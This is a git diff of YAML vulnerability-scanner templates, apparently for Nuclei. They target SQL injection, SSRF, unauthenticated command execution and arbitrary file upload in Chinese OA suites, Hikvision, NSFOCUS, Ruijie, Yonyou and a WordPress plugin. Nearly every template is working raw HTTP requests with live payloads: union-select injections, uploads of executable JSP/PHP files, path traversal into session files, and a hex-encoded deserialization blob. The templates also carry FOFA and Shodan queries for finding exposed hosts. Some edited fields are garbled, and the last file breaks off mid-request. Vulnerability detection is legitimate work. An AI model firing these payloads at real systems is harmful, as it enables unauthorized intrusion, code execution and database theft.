diff --git a/poc/sql_injection/tongda-report-func-sqli.yaml b/poc/sql_injection/tongda-report-func-sqli.yaml
new file mode 100755
index 0000000000..8b346b2340
--- /dev/null
+++ b/poc/sql_injection/tongda-report-func-sqli.yaml
@@ -0,0 +1,39 @@
+id: tongda-report-func-sqli
+
+info:
+  name: Tongda OA v11.6 report_bi.func.php - SQL injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    Tongda OA v11.6 report_bi.func.php has a SQL injection vulnerability, and attackers can obtain database information through the vulnerability.
+  reference:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20report_bi.func.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="TDXK-通达OA"
+  tags: tongda,sqli
+
+http:
+  - raw:
+      - |
+        POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        _POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"root@'
+          - '"para":'
+          - '"td_oa"'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4a0a0047304502202623ac67b5c9288c847a41c8d90dbd04d224ed78715cc2a7ab9efd4890d6f9bd022100d63e3e11d77b2dfa8cfe2eede3fa56019d78cc62312fac8445b11e6bfa15c563:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql_injection/weaver-checkserver-sqli.yaml b/poc/sql_injection/weaver-checkserver-sqli.yaml
new file mode 100644
index 0000000000..3610ea5855
--- /dev/null
+++ b/poc/sql_injection/weaver-checkserver-sqli.yaml
@@ -0,0 +1,32 @@
+id: weaver-checkserver-sqli
+
+info:
+  name: Ecology OA CheckServer - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    Ecology OA system improperly filters incoming data from users, resulting in a SQL injection vulnerability. Remote and unauthenticated attackers can use this vulnerability to conduct SQL injection attacks and steal sensitive database information.
+  reference:
+    - https://stack.chaitin.com/techblog/detail?id=81
+    - https://github.com/lal0ne/vulnerability/blob/main/%E6%B3%9B%E5%BE%AE/E-Cology/CheckServer/README.md
+    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-ecology-oa-plugin-checkserver-setting-sqli.yaml
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="泛微-协同办公OA"
+  tags: weaver,ecology,sqli
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/mobile/plugin/CheckServer.jsp?type=mobileSetting"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains_all(header, 'application/json','ecology_')"
+          - "contains(body, 'error\":\"system error') && !contains(body, 'securityIntercept')"
+        condition: and
+
+# digest: 4a0a0047304502203971c4e5664482479370bb1b1f56e4615b5a7d7b64f74ea6104ba1161c63cc3e022100c1e6508ec3615a4313c8cf683984d8424cd47b0d3b340e04a0e81cb5f713e4cf:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql_injection/weaver-ecology-getsqldata-sqli.yaml b/poc/sql_injection/weaver-ecology-getsqldata-sqli.yaml
new file mode 100755
index 0000000000..e187956800
--- /dev/null
+++ b/poc/sql_injection/weaver-ecology-getsqldata-sqli.yaml
@@ -0,0 +1,40 @@
+id: weaver-ecology-getsqldata-sqli
+
+info:
+  name: Weaver E-Cology `getsqldata` - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    When the getSqlData interface of the Panwei e-cology OA system uses the mssql database, the built-in SQL statements are not spliced strictly, resulting in a SQL injection vulnerability.
+  reference:
+    - https://github.com/Wrin9/weaverOA_sql_RCE/blob/14cca7a6da7a4a81e7c7a7016cb0da75b8b290bc/weaverOA_sql_injection_POC_EXP.py#L46
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,weaver,oa,sqli
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql="
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: word
+        part: body
+        words:
+          - '{"api_status":'
+          - '"status":true}'
+        condition: and
+
+# digest: 490a00463044022030ad64fd9961684672663bf926bddb0391c94c7fdc8811b4fade9b5f2a1f908b022006c35ef700880eefd6d5e1e757558e4ca0cb156164165191be70c8bec7479fdf:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql_injection/weaver-ecology-hrmcareer-sqli.yaml b/poc/sql_injection/weaver-ecology-hrmcareer-sqli.yaml
new file mode 100755
index 0000000000..92cef0c85e
--- /dev/null
+++ b/poc/sql_injection/weaver-ecology-hrmcareer-sqli.yaml
@@ -0,0 +1,36 @@
+id: weaver-ecology-hrmcareer-sqli
+
+info:
+  name: Weaver E-Cology HrmCareerApplyPerView - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    There is a SQL injection vulnerability in the HrmCareerApplyPerView.jsp file of Panwei OA E-Cology. An attacker can obtain sensitive files in the server database through the vulnerability.
+  reference:
+    - https://github.com/ibaiw/2023Hvv/blob/556de69ffc370fd9827e2cf5027373543e2513d4/%E6%B3%9B%E5%BE%AE%20HrmCareerApplyPerView%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md?plain=1#L3
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,weaver,oa,sqli
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','{{num}}')),4,5,6,7"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4a0a004730450221008a69da6dd9b0443019eb595747f9261d574b5a66de842c6185e142a5283fac49022003c7581a2daeebea8bd4eb05c1fc91f8676c9a2a46da1bc7b1e0717fa27fbca8:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql_injection/weaver-mysql-config-info-leak.yaml b/poc/sql_injection/weaver-mysql-config-info-leak.yaml
new file mode 100644
index 0000000000..85dad0d119
--- /dev/null
+++ b/poc/sql_injection/weaver-mysql-config-info-leak.yaml
@@ -0,0 +1,30 @@
+id: weaver-mysql-config-exposure
+
+info:
+  name: OA E-Office mysql_config.ini - Information Disclosure
+  author: SleepingBag945
+  severity: high
+  description: |
+    E-Office mysql_config.ini file can be directly accessed, leaking database account password and other information
+  reference:
+    - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA%20E-Office%20mysql_config.ini%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="泛微-EOffice"
+  tags: ecology,weaver,oa,lfi
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/mysql_config.ini"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(header,"text/plain")'
+          - 'contains_all(body,"datapassword", "datauser")'
+        condition: and
+
+# digest: 4a0a00473045022003d14acb438bcd3ddfaab392c67ae2d0fd30ddbe80da964d403b0403eee025dd022100d6c9d8d5b6864cd317a1b28d3c9a5eeb35e4a0bbfb64a43f01c526d2a5e63070:922c64590222798bb761d5b6d8e72950
diff --git a/poc/ssrf/office-webapps-ssrf.yaml b/poc/ssrf/office-webapps-ssrf.yaml
index 85231b0f37..dd69b267b1 100644
--- a/poc/ssrf/office-webapps-ssrf.yaml
+++ b/poc/ssrf/office-webapps-ssrf.yaml
@@ -4,6 +4,7 @@ info:
   name: Office Web Apps Server Full Read - Server Side Request Forgery
   author: DhiyaneshDK
   severity: high
+  description: Office Web Apps Server Full Read is vulnerable to SSRF.
   reference:
     - https://drive.google.com/file/d/1aeNq_5wVwHRR1np1jIRQM1hocrgcZ6Qu/view (Slide 37,38)
   metadata:
@@ -19,7 +20,7 @@ variables:
 http:
   - raw:
       - |
-        GET /oh/wopi/files/@/wFileId/contents?wFileId=http://{{oast}}/{{string}}.xlsx%3fbody={{string}}%26header=Location:http://oast.pro%26status=302&access_token_ttl=0 HTTP/1.1
+        GET /oh/wopi/files/@/wFileId/contents?wFileId=http://{{oast}}/{{string}}.xlsx%3fbody={{string}}%26header=Location:http://{{oast}}%26status=302&access_token_ttl=0 HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
@@ -29,5 +30,4 @@ http:
           - contains(body,'
 Interactsh Server 
')
           - status_code == 200
         condition: and
-
-# digest: 4a0a0047304502207e37c166b7939e67027a532a414b3ed954332b97d7a1ba9c8bc3ccf98c206614022100ba38deb6e2059ad4b76f56fae8b4f0accce143472e8c236e297c90365c1306c7:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100cbf861ff659932311fdb82c1a1d21e84d62817b2c805bc12eaacfdc5501c384a022061b6723822f822862e2d6b48259339781dcca9bd883f6502676870b3a14a1f26:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml
index 7f081b05e0..7e328a8b1b 100644
--- a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml
+++ b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml
@@ -1,48 +1,50 @@
 id: HIKVISION
 
 info:
-  name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file
-  author: Zero Trust Security Attack and Defense Laboratory
+  name: HHIKVISION iVMS-8700 upload Webshell file
+  author: zerZero Trust Security Attack and Defense Laboratory
   severity: high
   description: |
-    HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files
+    HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file
   metadata:
     fofa-query: icon_hash="-911494769"
     hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685"
 
 
 variables:
-  str1: '{{rand_base(6)}}'
-  str2: '{{rand_base(6)}}'
-  str3: '<%out.print("{{str2}}");%>'
+  str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding'
 
 http:
   - raw:
       - |
-        POST /eps/resourceOperations/upload.action HTTP/1.1
+        POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: MicroMessenger
-        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj
-
-        ------WebKitFormBoundaryTJyhtTNqdMNLZLhj
-        Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp"
+        User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Connection: close
+        Content-Length: 184
+        Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15
+
+        --c4155aff43901a8b2a19a4641a5efa15
+        Content-Disposition: form-data; name="fileUploader"; filename="test.jsp"
         Content-Type: image/jpeg
 
-        {{str3}}
-        ------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
+        {{randstr}}
+        --c4155aff43901a8b2a19a4641a5efa15--
 
       - |
-        GET /eps/upload/{{res_id}}.jsp HTTP/1.1
+        GET /eps/upload/{{name}}.jsp HTTP/1.1
         Host: {{Hostname}}
 
     extractors:
       - type: json
-        name: res_id
+        name: name
         json:
           - ".data.resourceUuid"
         internal: true
 
     matchers:
-      - type: dsl
-        dsl:
-          - body_2 == str2
+      - type: word
+        words:
+          - '{{randstr}}'
diff --git a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml
index 1cd783867f..a8f9cbe173 100644
--- a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml
+++ b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml
@@ -1,28 +1,59 @@
 id: Green-Alliance
 
 info:
-  name: Green Alliance SAS Fortress GetFile Arbitrary File Read Vulnerability
+  name: Green Alliance NF Next Generation Firewall Arbitrary File Upload Vulnerability
   author: Zero Trust Security Attack and Defense Laboratory
-  severity: medium
+  severity: high
   description: |
-    There is an arbitrary user login vulnerability in the Green Alliance Fortress machine, which allows attackers to exploit vulnerabilities including www/local_ User. php enables any user to log in
+    Green Alliance SSL VPN has an arbitrary file upload vulnerability, allowing attackers to obtain server privileges and execute remote commands by sending special request packets
   metadata:
-    fofa-query: body="'/needUsbkey.php?username='"
-    hunter-query: web.body="'/needUsbkey.php?username='"
+    fofa-query: app="NSFOCUS-下一代防火墙"
+    hunter-query: web.title="用户认证 - NSFOCUS NF"
+
 
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd"
+  - raw:
+      - |
+        POST /api/v1/device/bugsInfo HTTP/1.1
+        Host: {{Host}}:8081
+        Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+        Content-Length: 238
+        Accept-Encoding: gzip, deflate
+        Connection: close
+
+        --1d52ba2a11ad8a915eddab1a0e85acd9
+        Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac72"
+
+        lang|s:52:"../../../../../../../../../../../../../../../../tmp/";
+        --1d52ba2a11ad8a915eddab1a0e85acd9--
+
+      - |
+        POST /api/v1/device/bugsInfo HTTP/1.1
+        Host: {{Host}}:8081
+        Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+        Content-Length: 217
+        Accept-Encoding: gzip, deflate
+        Connection: close
+
+        --4803b59d015026999b45993b1245f0ef
+        Content-Disposition: form-data; name="file"; filename="compose.php"
+
+        
+        --4803b59d015026999b45993b1245f0ef--
+        
+      - |
+        GET /mail/include/header_main.php HTTP/1.1
+        Host: {{Host}}:4433
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+        Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac72
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - "nologin"
-
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200 && contains(body_1, 'upload file success')"
+          - "status_code_2 == 200 && contains(body_2, 'upload file success')"
+          - "status_code_3 == 200 && contains(body_3, '{{randstr}}')"
+        condition: and
diff --git a/poc/upload/Ruijie_NBR_Router_fileupload.yaml b/poc/upload/Ruijie_NBR_Router_fileupload.yaml
index fa762ac2f6..f2db119795 100644
--- a/poc/upload/Ruijie_NBR_Router_fileupload.yaml
+++ b/poc/upload/Ruijie_NBR_Router_fileupload.yaml
@@ -1,37 +1,33 @@
 id: Ruijie
 
 info:
-  name: Ruijie NBR Router fileupload.php Arbitrary File Upload Vulnerability
+  name: Ruijie Switch WEB Management System EXCU_ SHELL
   author: Zero Trust Security Attack and Defense Laboratory
   severity: high
   description: |
-    Ruijie NBR router has an arbitrary file upload vulnerability in the fileupload.php file, which allows attackers to upload arbitrary files to the server and obtain server privileges
+    Ruijie Switch WEB Management System EXCU_ SHELL
   metadata:
-    fofa-query: app="Ruijie-NBR路由器"
-    hunter-query: web.title="锐捷网络 --NBR路由器--登录界面"
+    fofa-query: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
+    hunter-query: web.body="img/free_login_ge.gif"&&body="./img/login_bg.gif"
 
 
 http:
   - raw:
       - |
-          POST /ddi/server/fileupload.php?uploadDir=../../321&name=test.php HTTP/1.1
+          GET /EXCU_SHELL HTTP/1.1
           Host: {{Hostname}}
-          Accept: text/plain, */*; q=0.01
-          Content-Disposition: form-data; name="file"; filename="111.php"
-          Content-Type: image/jpeg
+          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36
+          Accept-Encoding: gzip, deflate
+          Accept: */*
+          Connection: close
+          Cmdnum: '1'
+          Command1: show running-config
+          Confirm1: n
 
-          
-      - |
-          GET /321/test.php  HTTP/1.1
-          Host: {{Hostname}}
-          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
-      
     req-condition: true
     matchers:
       - type: dsl
         dsl:
           - 'status_code_1 == 200'
-          - 'status_code_2 == 200'
-          - 'contains(body_1, "test.php")'
-          - 'contains(body_2, "PHP Version")'
+          - 'contains(body_1, "configuration")'
         condition: and
diff --git a/poc/upload/weaver-eoffice-file-upload.yaml b/poc/upload/weaver-eoffice-file-upload.yaml
new file mode 100644
index 0000000000..40adea2e05
--- /dev/null
+++ b/poc/upload/weaver-eoffice-file-upload.yaml
@@ -0,0 +1,61 @@
+id: weaver-eoffice-file-upload
+
+info:
+  name: Weaver E-Office v9.5 - Arbitrary File Upload
+  author: princechaddha
+  severity: high
+  description: |
+    Weaver E-Office version 9.5 is susceptible to an arbitrary file upload vulnerability. This flaw allows malicious actors to upload and execute arbitrary code or files without proper validation or authorization.
+  reference:
+    - https://github.com/RCEraser/cve/blob/main/Weaver.md
+  metadata:
+    verified: true
+    max-request: 2
+    fofa-query: app="泛微-EOffice"
+  tags: e-office,weaver,intrusive,file-upload
+variables:
+  filename: '{{rand_base(7, "abc")}}'
+
+http:
+  - raw:
+      - |
+        POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+
+        ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+        Content-Disposition: form-data; name="upload_quwan"; filename="{{filename}}.phP"
+        Content-Type: image/jpeg
+
+        {{randstr}}
+        ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+        Content-Disposition: form-data; name="file"; filename=""
+        Content-Type: application/octet-stream
+
+
+        ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
+      - |
+        GET /attachment/{{id}}/{{filename}}.phP HTTP/1.1
+        Host: {{Hostname}}
+
+    host-redirects: true
+    max-redirects: 2
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - '{{randstr}}'
+
+    extractors:
+      - type: regex
+        name: id
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '\\\/attachment\\\/([0-9]+)\\\/'
+
+# digest: 4b0a00483046022100cb2ea659985e0e6a70be38ce3127d612a7bb63b072df2cb43e4efe695bd304b0022100d305f452c2f830e004937b472bc867c5d0e8feab8e0846a113a5d8a5e163c33b:922c64590222798bb761d5b6d8e72950
diff --git a/poc/upload/weaver-ktreeuploadaction-file-upload.yaml b/poc/upload/weaver-ktreeuploadaction-file-upload.yaml
new file mode 100755
index 0000000000..04c63cc834
--- /dev/null
+++ b/poc/upload/weaver-ktreeuploadaction-file-upload.yaml
@@ -0,0 +1,57 @@
+id: weaver-ktreeuploadaction-file-upload
+
+info:
+  name: Weaver E-Cology KtreeUploadAction - Arbitrary File Upload
+  author: SleepingBag945
+  severity: critical
+  description: |
+    There is a file upload vulnerability in Weaver E-Cology. An attacker can upload any file through KtreeUploadAction.jsp and further exploit it.
+  reference:
+    - https://buaq.net/go-117479.html
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: weaver,ecology,fileupload,intrusive
+variables:
+  num1: "{{rand_int(40000, 50000)}}"
+  num2: "{{rand_int(40000, 50000)}}"
+  result: "{{to_number(num1)*to_number(num2)}}"
+
+http:
+  - raw:
+      - |
+        @timeout: 20s
+        POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib
+
+        ------WebKitFormBoundarywgljfvib
+        Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp"
+        Content-Type: image/jpeg
+
+        <%out.print({{num1}} * {{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+        ------WebKitFormBoundarywgljfvib--
+      - |
+        @timeout: 20s
+        GET {{filename}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200 && contains_all(body_1,'original', 'SUCCESS')"
+          - "contains(body_2, '{{result}}') && status_code_2 == 200"
+        condition: and
+
+    extractors:
+      - type: regex
+        name: filename
+        group: 1
+        regex:
+          - "','url':'(.*?)','title"
+        internal: true
+
+# digest: 490a0046304402203845240787e3da61949c359ff2e44cc0797d850f8aa35cbf4e8a9cb052a3bb5b022003685a977b9463c7de0e27f8227f54e5559e6dc17663eb17c1f35122ea4a7f24:922c64590222798bb761d5b6d8e72950
diff --git a/poc/upload/weaver-uploadoperation-file-upload.yaml b/poc/upload/weaver-uploadoperation-file-upload.yaml
new file mode 100755
index 0000000000..b3e4dd4341
--- /dev/null
+++ b/poc/upload/weaver-uploadoperation-file-upload.yaml
@@ -0,0 +1,77 @@
+id: weaver-uploadoperation-file-upload
+
+info:
+  name: Weaver OA Workrelate - Arbitary File Upload
+  author: SleepingBag945
+  severity: critical
+  description: |
+    Ecology contains an arbitrary file upload vulnerability. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code, As a result, an attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  reference:
+    - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
+    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-oa-workrelate-file-upload.yaml
+  metadata:
+    max-request: 3
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,fileupload,intrusive
+variables:
+  filename: "{{to_lower(rand_base(5))}}"
+  string: "{{randstr}}"
+
+http:
+  - raw:
+      - |
+        POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
+        Accept: */*
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVdb2RRl25PuaGhWj
+        Accept-Encoding: gzip
+
+        ------WebKitFormBoundaryVdb2RRl25PuaGhWj
+        Content-Disposition: form-data; name="secId"
+
+        1
+        ------WebKitFormBoundaryVdb2RRl25PuaGhWj
+        Content-Disposition: form-data; name="Filedata"; filename="{{filename}}.jsp"
+
+        <%out.println("{{string}}");%>
+        ------WebKitFormBoundaryVdb2RRl25PuaGhWj
+        Content-Disposition: form-data; name="plandetailid"
+
+        1
+        ------WebKitFormBoundaryVdb2RRl25PuaGhWj--
+      - |
+        POST /OfficeServer HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
+        Accept: */*
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVdb2RRl25PuaGhWj
+        Accept-Encoding: gzip
+
+        ------WebKitFormBoundaryVdb2RRl25PuaGhWj
+        Content-Disposition: form-data; name="aaa"
+
+        {"OPTION":"INSERTIMAGE","isInsertImageNew":"1","imagefileid4pic":"{{fileid}}"}
+        ------WebKitFormBoundaryVdb2RRl25PuaGhWj--
+      - |
+        GET /{{filename}}.jsp HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: fileid
+        internal: true
+        group: 1
+        regex:
+          - "&fileid=(.*?)\\'>"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200 && contains(body_1,'workrelate/plan/util/ViewDoc')"
+          - "status_code_2 == 200 && contains(body_2, 'println')"
+          - "status_code_3 == 200 && contains(body_3,'{{string}}')"
+        condition: and
+
+# digest: 4a0a00473045022100842d0c47c12fe663e3da34832c889d568c8fffb3740648bbccc968954dd1c6e40220140f9f9b1d82e205c7bbcb715d2bfb99c4513d6cc842990a9618fd21e4c97721:922c64590222798bb761d5b6d8e72950
diff --git a/poc/upload/wp-gallery-file-upload.yaml b/poc/upload/wp-gallery-file-upload.yaml
new file mode 100644
index 0000000000..1459b7f9ce
--- /dev/null
+++ b/poc/upload/wp-gallery-file-upload.yaml
@@ -0,0 +1,48 @@
+id: wp-gallery-file-upload
+
+info:
+  name: WordPress Plugin Gallery 3.06 - Arbitrary File Upload
+  author: r3Y3r53
+  severity: high
+  description: |
+    The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability.
+  remediation: Fixed in version 3.1.1
+  reference:
+    - https://www.exploit-db.com/exploits/18998
+    - http://wordpress.org/extend/plugins/gallery-plugin/
+    - http://downloads.wordpress.org/plugin/gallery-plugin.3.06.zip
+    - https://wpscan.com/vulnerability/049c8518-1f52-4aa4-b0b3-218289727353
+  metadata:
+    verified: true
+    max-request: 2
+    publicwww-query: /wp-content/plugins/gallery-plugin/
+    google-query: inurl:/wp-content/plugins/gallery-plugin/
+  tags: wp,wp-plugin,wordpress,wpscan,file-upload,intrusive
+variables:
+  filename: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+  - raw:
+      - |
+        POST /wp-content/plugins/gallery-plugin/upload/php.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=WebKitFormBoundary20kgW2hEKYaeF5iP
+
+        --WebKitFormBoundary20kgW2hEKYaeF5iP
+        Content-Disposition: form-data; name="qqfile"; filename="{{filename}}.png"
+
+        {{randstr}}
+
+        --WebKitFormBoundary20kgW2hEKYaeF5iP--
+      - |
+        GET /wp-content/plugins/gallery-plugin/upload/files/{{filename}}.png HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(content_type_1, "text/html") && contains(content_type_2, "image/png")'
+          - 'contains(body_1, "success:true") && contains(body_2, "{{randstr}}")'
+        condition: and
+
+# digest: 4a0a0047304502202a745722b545793e04182b1db3e42251980ddd30a3bf2d24a01e66f5835d48c3022100a51cc6736be76c352b14ba34112aee6f4c91b99534d7c684bb5a22aa8538f467:922c64590222798bb761d5b6d8e72950
diff --git a/poc/upload/yonyou-nc-dispatcher-fileupload.yaml b/poc/upload/yonyou-nc-dispatcher-fileupload.yaml
new file mode 100755
index 0000000000..374ae31b0d
--- /dev/null
+++ b/poc/upload/yonyou-nc-dispatcher-fileupload.yaml
@@ -0,0 +1,38 @@
+id: yonyou-nc-dispatcher-fileupload
+
+info:
+  name: Yonyou NC ServiceDispatcher Servlet - Arbitrary File Upload
+  author: SleepingBag945
+  severity: critical
+  description: |
+    Yonyou NC ServiceDispatcherServlet deserialization file upload vulnerability.
+  reference:
+    - https://github.com/lal0ne/vulnerability/blob/c0985107adfd91d85fbd76d9a8acf8fbfa98ed41/YonyouNC/ncDecode/README.md
+  metadata:
+    verified: true
+    max-request: 2
+    fofa-query: icon_hash="1085941792"
+  tags: yonyou,intrusive,fileupload
+
+http:
+  - raw:
+      - |
+        POST /ServiceDispatcherServlet HTTP/1.1
+        Content-Type: application/data
+        Host: {{Hostname}}
+        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+
+        {{hex_decode("0000015C7271890390CEA362632F6E8819F73AC2FA807D6CAF41AE772EC2DF10A2AB43A4C7BAF2C7F57909B2C19D6CF5DE6E565331E70CB3C2E70A3AF6D1E3C4480035F870288D440C41742E3EC659DA538CC3CAA2AE86569D62D002D8CE52D7D184BE7556F95C7567C1AC40FDD7502AF38BAE48C14D6A4F473779542BD7D1072973C4CD093C6BC1D0266BE82F15EEB96D146BAF89297059448A2EDDDF63463984FFC2247032EAD18E03422B87A8CC01E651A50DD09A1DE3C87ED376B43366DE024EE3880B7006A56DF97073A7472B444FF53433DD0AE63758FEB43A808B49DA0CB5B23783C3DE07C5182D35CD467D9CA2081B47EB7F604E84A1B7DA7E665A2B5D6B04F94C838AF6AE6E4829304C2D750A0A1400860F9D7611BA8DEA77AE8C79AD44F90C55A74DD3D06D27B5F3A583E8C3FCC27FC8C9B660F0C3B52B76DB7B3A0B87D04FE98DF57D2851FD93F40D04A3DA14C658E5BCBD9DCB74E35AB50818EF")}}
+      - |
